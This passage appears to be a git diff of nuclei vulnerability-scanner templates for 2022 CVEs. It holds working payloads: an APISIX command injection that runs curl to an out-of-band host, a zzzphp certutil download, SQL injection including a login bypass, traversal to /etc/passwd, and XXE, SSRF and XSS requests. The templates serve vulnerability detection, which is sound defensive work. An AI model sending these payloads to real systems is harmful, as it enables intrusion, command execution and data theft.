cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-23779 + cwe-id: CWE-200 + tags: cve,cve2022,zoho,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/themes" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + + - type: word + part: header + words: + - '/themes/' + - 'text/html' + condition: and + + - type: word + part: location + words: + - '{{Host}}' + negative: true + + - type: word + words: + - '

301 Moved Permanently

' + + - type: regex + part: location + regex: + - 'https?:\/\/(.*):' + + extractors: + - type: regex + part: location + group: 1 + regex: + - 'https?:\/\/(.*):' + +# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml deleted file mode 100644 index 84b802eba2..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-23881 - -info: - name: zzzphp v2.1.0 RCE - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - tags: cve,cve2022,rce,zzzphp,zzzcms - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml b/nuclei-templates/CVE-2022/CVE-2022-24112.yaml deleted file mode 100644 index 5f79eaed68..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: CVE-2022-24112 - -info: - name: Apache APISIX - Remote Code Execution - author: Mr-xn - severity: critical - description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. - reference: - - https://www.openwall.com/lists/oss-security/2022/02/11/3 - - https://twitter.com/sirifu4k1/status/1496043663704858625 - - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests - - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-24112 - cwe-id: CWE-290 - metadata: - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org - shodan-query: title:"Apache APISIX Dashboard" - tags: cve,cve2022,apache,rce,apisix,oast,kev - -requests: - - raw: - - | - POST /apisix/batch-requests HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - { - "headers":{ - "X-Real-IP":"127.0.0.1", - "Content-Type":"application/json" - }, - "timeout":1500, - "pipeline":[ - { - "method":"PUT", - "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}" - } - ] - } - - | - GET /api/{{randstr}} HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - '"reason":"OK"' - - '"status":200' - condition: and - - - type: status - status: - - 200 - - - type: word - part: interactsh_protocol - words: - - 'http' - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - 'GET \/([a-z-]+) HTTP' - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml b/nuclei-templates/CVE-2022/CVE-2022-24129.yaml deleted file mode 100644 index 073b046241..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24129.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-24129 -info: - name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery - author: 0x_Akoko - severity: high - description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services. - reference: - - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF - - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP - - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 - - http://shibboleth.net/community/advisories/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N - cvss-score: 8.2 - cve-id: CVE-2022-24129 - cwe-id: CWE-918 - tags: cve,cve2022,ssrf,oidc,shibboleth -requests: - - method: GET - path: - - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: word - part: interactsh_request - words: - - "ShibbolethIdp" diff --git a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml new file mode 100644 index 0000000000..706599f0a0 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-24181 +info: + name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) + author: lucasljm2001,ekrause + severity: medium + description: | + Detects an XSS vulnerability in Open Journals System. + reference: + - https://www.exploit-db.com/exploits/50881 + - https://github.com/pkp/pkp-lib/issues/7649 + - https://youtu.be/v8-9evO2oVg + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 + - https://nvd.nist.gov/vuln/detail/cve-2022-24181 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24181 + metadata: + verified: true + tags: cve,cve2022,xss,oss,pkp-lib +requests: + - raw: + - | + GET /iupjournals/index.php/esj HTTP/2 + Host: {{Hostname}} + X-Forwarded-Host: foo">alert(document.domain)' - - '' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml deleted file mode 100644 index 40edb599f1..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-26233 - -info: - name: Barco Control Room Management Suite - Directory Traversal - author: 0x_akoko - severity: high - description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. - reference: - - https://0day.today/exploit/37579 - - https://www.cvedetails.com/cve/CVE-2022-26233 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-26233 - cwe-id: CWE-22 - tags: cve,cve2022,barco,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml deleted file mode 100644 index 21b4f71879..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2022-26960 -info: - name: elFinder <=2.1.60 - Local File Inclusion - author: pikpikcu - severity: critical - description: | - elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. - reference: - - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db - - https://www.synacktiv.com/publications.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-26960 - cwe-id: CWE-22 - metadata: - verified: true - tags: cve,cve2022,lfi,elfinder -requests: - - raw: - - | - GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml b/nuclei-templates/CVE-2022/CVE-2022-27927.yaml deleted file mode 100644 index 96820d1ca3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-27927 -info: - name: Microfinance Management System 1.0 - SQL Injection - author: lucasljm2001,ekrause - severity: critical - description: | - Microfinance Management System 1.0 is susceptible to SQL Injection. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - - https://www.exploit-db.com/exploits/50891 - - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-27927 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,microfinance -variables: - num: "999999999" -requests: - - raw: - - | - GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml new file mode 100644 index 0000000000..8124852465 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-28079 +info: + name: College Management System - SQL Injection + author: ritikchaddha + severity: high + description: | + College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. + reference: + - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated + - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f + - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 + - https://code-projects.org/college-management-system-in-php-with-source-code/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28079 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,cms,collegemanagement +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/asign-single-student-subjects.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + matchers-condition: and + matchers: + - type: word + words: + - '{{md5({{num}})}}' + - type: status + status: + - 302 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml deleted file mode 100644 index dc59377c75..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: CVE-2022-28080 -info: - name: Royal Event - SQL Injection - author: lucasljm2001,ekrause,ritikchaddha - severity: high - description: | - Detects an SQL Injection vulnerability in Royal Event System - reference: - - https://www.exploit-db.com/exploits/50934 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated,cms,royalevent -requests: - - raw: - - | - POST /royal_event/ HTTP/1.1 - Host: {{Hostname}} - Content-Length: 353 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="username" - - {{username}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="password" - - {{password}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="login" - - - ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | - POST /royal_event/btndates_report.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="todate" - - 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="search" - - 3 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="fromdate" - - 01/01/2011 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '{{md5("{{randstr}}")}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml b/nuclei-templates/CVE-2022/CVE-2022-28219.yaml deleted file mode 100644 index a812336fd8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28219.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2022-28219 -info: - name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an - unauthenticated XML entity injection attack that can lead to remote code execution. - reference: - - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html - - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ - - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 - remediation: | - Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus - is configured with a dedicated service account with restricted privileges. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-28219 - cwe-id: CWE-611 - metadata: - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" - verified: "true" - tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth -requests: - - method: POST - path: - - "{{BaseURL}}/api/agent/tabs/agentData" - headers: - Content-Type: application/json - body: | - [ - { - "DomainName": "{{Host}}", - "EventCode": 4688, - "EventType": 0, - "TimeGenerated": 0, - "Task Content": " %xxe; ]>" - } - ] - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: word - part: body - words: - - "ManageEngine" - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-28365.yaml b/nuclei-templates/CVE-2022/CVE-2022-28365.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-28365.yaml rename to nuclei-templates/CVE-2022/CVE-2022-28365.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29014.yaml b/nuclei-templates/CVE-2022/CVE-2022-29014.yaml deleted file mode 100644 index 8d1df858e8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29014.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2022-29014 -info: - name: Razer Sila Gaming Router v2.0.441_api-2.0.418 - LFI - author: edoardottt - severity: high - description: A local file inclusion vulnerability in Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to read arbitrary files. - reference: - - https://www.exploit-db.com/exploits/50864 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29014 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29014 - tags: cve,cve2022,razer,lfi,router -requests: - - raw: - - | - POST /ubus/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml deleted file mode 100644 index 191cb6e9b8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2022-29298 -info: - name: SolarView Compact 6.00 - Directory Traversal - author: ritikchaddha - severity: high - description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal. - reference: - - https://www.exploit-db.com/exploits/50950 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29298 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,lfi,solarview -requests: - - method: GET - path: - - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-29303.yaml rename to nuclei-templates/CVE-2022/CVE-2022-29303.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29383.yaml b/nuclei-templates/CVE-2022/CVE-2022-29383.yaml deleted file mode 100644 index da7756d355..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29383.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-29383 -info: - name: NETGEAR ProSafe SSL VPN firmware - SQL Injection - author: elitebaz - severity: critical - description: | - NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. - reference: - - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 - - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-29383 - metadata: - verified: "true" - tags: cve,cve2022,sqli,netgear,router -requests: - - raw: - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - - | - POST /scgi-bin/platform.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd - req-condition: true - matchers: - - type: dsl - dsl: - - contains(body_1, "User authentication Failed") - - contains(body_2, "User Login Failed for SSLVPN User.") - condition: and - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml deleted file mode 100644 index f6b5e980e8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-29548 -info: - name: WSO2 Management Console - Reflected XSS - author: edoardottt - severity: medium - description: | - A reflected XSS issue exists in the Management Console of several WSO2 products. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30776.yaml b/nuclei-templates/CVE-2022/CVE-2022-30776.yaml new file mode 100644 index 0000000000..13cca2459e --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30776.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-30776 +info: + name: Atmail - Cross Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter. + reference: + - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 + - https://www.atmail.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 + - https://help.atmail.com/hc/en-us/sections/115003283988 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30776 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"atmail" + verified: "true" + tags: cve,cve2022,atmail,xss +requests: + - method: GET + path: + - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Error: 1" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml b/nuclei-templates/CVE-2022/CVE-2022-31268.yaml deleted file mode 100644 index ada90dc224..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31268.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-31268 -info: - name: Gitblit 1.9.3 - Path traversal - author: 0x_Akoko - severity: high - description: | - A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). - reference: - - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - - https://www.cvedetails.com/cve/CVE-2022-31268 - - https://vuldb.com/?id.200500 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31268 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Gitblit" - verified: "true" - tags: cve,cve2022,lfi,gitblit -requests: - - method: GET - path: - - "{{BaseURL}}/resources//../WEB-INF/web.xml" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "java.sun.com" - - "gitblit.properties" - condition: and - - type: word - part: header - words: - - "application/xml" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml deleted file mode 100644 index c09b86777f..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2022-31373 -info: - name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) - author: ritikchaddha - severity: medium - description: | - SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. - reference: - - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-31373 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,xss,solarview -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/Solar_AiConf.php/">' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml deleted file mode 100644 index b1faf475d6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2022-32015 -info: - name: Complete Online Job Search System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32015 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,jobsearch -variables: - num: "999999999" -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32022.yaml b/nuclei-templates/CVE-2022/CVE-2022-32022.yaml new file mode 100644 index 0000000000..6face31438 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32022.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-32022 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32022 + cwe-id: CWE-89 + metadata: + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,login-bypass +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin'+or+'1'%3D'1'%23&password=admin + - | + GET /admin/index.php?page=home HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + 